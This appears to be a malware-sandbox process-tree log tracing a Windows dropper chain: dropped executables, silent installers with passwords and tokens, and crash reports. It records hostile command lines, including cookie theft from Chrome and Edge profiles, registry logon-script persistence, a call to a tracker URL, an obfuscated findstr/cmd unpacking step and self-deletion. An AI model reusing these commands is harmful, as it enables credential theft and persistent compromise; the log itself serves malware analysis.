C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe
"C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"
2⤵
- Executes dropped EXE
PID:4028

C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe
"C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"
3⤵
- Modifies data under HKEY_USERS
PID:8236

C:\Users\Admin\Documents\Ls6HCRy7CjYIm6XRO_DMyU5M.exe
"C:\Users\Admin\Documents\Ls6HCRy7CjYIm6XRO_DMyU5M.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 760
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 784
3⤵
- Program crash
PID:3260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 820
3⤵
- Program crash
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 856
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 956
3⤵
- Program crash
PID:5176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 984
3⤵
- Program crash
PID:5484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1020
3⤵
- Program crash
PID:5756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1456
3⤵
- Program crash
PID:5940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1496
3⤵
- Program crash
PID:5208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1500
3⤵
- Program crash
PID:6116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1688
3⤵
- Program crash
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1488
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6064

C:\Users\Admin\Documents\MWJd3mPPIlWyLa2RpIzVqQrH.exe
"C:\Users\Admin\Documents\MWJd3mPPIlWyLa2RpIzVqQrH.exe"
2⤵
- Executes dropped EXE
PID:4492

C:\Users\Admin\Documents\5vpgJBjyfbnbMk1YeKUgbWC8.exe
"C:\Users\Admin\Documents\5vpgJBjyfbnbMk1YeKUgbWC8.exe"
2⤵
- Executes dropped EXE
PID:4612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 660
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 716
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 664
3⤵
- Program crash
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 668
3⤵
- Program crash
PID:2032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1160
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1120
3⤵
- Program crash
PID:992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1112
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Users\Admin\Documents\Xdb1fFnJhrYC1plDJxt3VPoy.exe
"C:\Users\Admin\Documents\Xdb1fFnJhrYC1plDJxt3VPoy.exe"
2⤵
- Executes dropped EXE
PID:4948

C:\Users\Admin\Documents\yY2qmC4iOLBQc_v9oIAFRu3F.exe
"C:\Users\Admin\Documents\yY2qmC4iOLBQc_v9oIAFRu3F.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4672

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
- Executes dropped EXE
PID:4832

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:3180

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:5912

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:2704

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:2520

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
- Executes dropped EXE
PID:4512

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:2188

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:6016

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:5524

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:5356

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4512 -s 1536
4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1220

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5040

C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe
"C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:492

C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe
"C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"
2⤵
- Executes dropped EXE
PID:184

C:\Users\Admin\AppData\Local\Temp\is-6BVRA.tmp\DvMwGNgUky7bXWwCd2_zhu5C.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6BVRA.tmp\DvMwGNgUky7bXWwCd2_zhu5C.tmp" /SL5="$40266,138429,56832,C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4372

C:\Users\Admin\AppData\Local\Temp\is-33Q2P.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-33Q2P.tmp\Setup.exe" /Verysilent
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4444

C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
5⤵
- Executes dropped EXE
PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 752
6⤵
- Program crash
PID:6060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 776
6⤵
- Program crash
PID:5964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 800
6⤵
- Program crash
PID:7144

C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
5⤵
- Executes dropped EXE
PID:5952

C:\Users\Admin\AppData\Local\Temp\is-2P2NR.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2P2NR.tmp\Inlog.tmp" /SL5="$20254,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5280

C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
7⤵
PID:7400

C:\Users\Admin\AppData\Local\Temp\is-8GTL4.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8GTL4.tmp\Setup.tmp" /SL5="$4028A,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
8⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7664

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\microsoft.cab -F:* %ProgramData%
9⤵
PID:5556

C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\microsoft.cab -F:* C:\ProgramData
10⤵
- Drops file in Windows directory
PID:7108

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
9⤵
PID:3508

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
10⤵
PID:3800

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
9⤵
- Checks computer location settings
PID:1176

C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
9⤵
- Loads dropped DLL
PID:8416

C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler"
9⤵
PID:660

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler.exe"
10⤵
PID:2884

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
11⤵
- Runs ping.exe
PID:8292

C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
5⤵
- Executes dropped EXE
PID:6068

C:\Users\Admin\AppData\Local\Temp\is-6A3OQ.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6A3OQ.tmp\WEATHER Manager.tmp" /SL5="$401DE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5540

C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
7⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7324

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
8⤵
PID:8524

C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
5⤵
- Executes dropped EXE
PID:6108

C:\Users\Admin\AppData\Local\Temp\is-U04EQ.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U04EQ.tmp\VPN.tmp" /SL5="$20256,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5616

C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe" /silent /subid=720
7⤵
PID:7972

C:\Users\Admin\AppData\Local\Temp\is-BQEBS.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BQEBS.tmp\Setup.tmp" /SL5="$30288,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe" /silent /subid=720
8⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:8052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
9⤵
PID:8392

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
10⤵
- Checks SCSI registry key(s)
PID:8436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
9⤵
PID:8864

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
10⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:7732

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3416

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2184

C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5192

C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
5⤵
- Executes dropped EXE
PID:5360

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:6836

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:6916

C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
5⤵
- Executes dropped EXE
PID:5560

C:\Users\Admin\AppData\Roaming\5918109.exe
"C:\Users\Admin\AppData\Roaming\5918109.exe"
6⤵
- Executes dropped EXE
PID:5020

C:\Users\Admin\AppData\Roaming\4164647.exe
"C:\Users\Admin\AppData\Roaming\4164647.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:5744

C:\Users\Admin\AppData\Roaming\4417789.exe
"C:\Users\Admin\AppData\Roaming\4417789.exe"
6⤵
- Executes dropped EXE
PID:6320

C:\Users\Admin\AppData\Roaming\4278010.exe
"C:\Users\Admin\AppData\Roaming\4278010.exe"
6⤵
- Executes dropped EXE
PID:6240

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
5⤵
PID:5636

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
6⤵
- Executes dropped EXE
PID:4520

C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
5⤵
PID:5420

C:\Users\Admin\AppData\Local\Temp\is-UEE73.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UEE73.tmp\MediaBurner2.tmp" /SL5="$1030E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5032

C:\Users\Admin\AppData\Local\Temp\is-RG9UP.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-RG9UP.tmp\3377047_logo_media.exe" /S /UID=burnerch2
7⤵
PID:6276

C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe
"C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe" /VERYSILENT
8⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\is-4QFNF.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4QFNF.tmp\ultramediaburner.tmp" /SL5="$30294,281924,62464,C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe" /VERYSILENT
9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7852

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
PID:7916

C:\Users\Admin\AppData\Local\Temp\7e-dd116-ba9-f80ac-43521baecbf98\Gaemataeshani.exe
"C:\Users\Admin\AppData\Local\Temp\7e-dd116-ba9-f80ac-43521baecbf98\Gaemataeshani.exe"
8⤵
- Checks computer location settings
PID:772

C:\Users\Admin\AppData\Local\Temp\e8-c9bea-ea6-ed5b1-d27f02c38b513\Miruxatabu.exe
"C:\Users\Admin\AppData\Local\Temp\e8-c9bea-ea6-ed5b1-d27f02c38b513\Miruxatabu.exe"
8⤵
PID:3504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe /eufive & exit
9⤵
PID:6836

C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe /eufive
10⤵
PID:8200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:8460

C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe
C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe /qn CAMPAIGN="654"
10⤵
PID:8924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zqxe0sbg.plp\ufgaa.exe & exit
9⤵
PID:8780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe & exit
9⤵
PID:8320

C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe
C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe" -q
11⤵
PID:8600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe /mixfive & exit
9⤵
PID:8968

C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe /mixfive
10⤵
PID:8172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3di1wj4c.u5s\autosubplayer.exe /S & exit
9⤵
- Suspicious use of SetWindowsHookEx
PID:8892

C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:6008

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
6⤵
PID:6668

C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
5⤵
- Executes dropped EXE
PID:5684

C:\Users\Admin\AppData\Local\Temp\tmpDB29_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpDB29_tmp.exe"
6⤵
PID:7152

C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
7⤵
PID:7636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
7⤵
PID:4900

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:6256

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
9⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
9⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5936

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
10⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5580

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
11⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2776

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
12⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
13⤵
- Suspicious use of SendNotifyMessage
PID:7352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
14⤵
- Suspicious use of SendNotifyMessage
PID:8224

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
15⤵
- Suspicious use of SendNotifyMessage
PID:8896

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
16⤵
- Suspicious use of SendNotifyMessage
PID:8288

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
17⤵
- Suspicious use of SendNotifyMessage
PID:8256

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
18⤵
PID:7520

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
19⤵
- Suspicious use of SendNotifyMessage
PID:8380

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
20⤵
- Suspicious use of SendNotifyMessage
PID:8668

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
21⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
22⤵
- Suspicious use of SendNotifyMessage
PID:7888

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
23⤵
PID:8544

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
24⤵
- Suspicious use of SendNotifyMessage
PID:7900

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
25⤵
- Suspicious use of SendNotifyMessage
PID:8012

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
26⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
27⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of SendNotifyMessage
PID:7764

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
28⤵
PID:7828

C:\Windows\SysWOW64\PING.EXE
ping GFBFPSXA -n 30
9⤵
- Runs ping.exe
PID:2532

C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2072

C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe
"C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe"
6⤵
PID:5908

C:\Windows\System32\cmd.exe
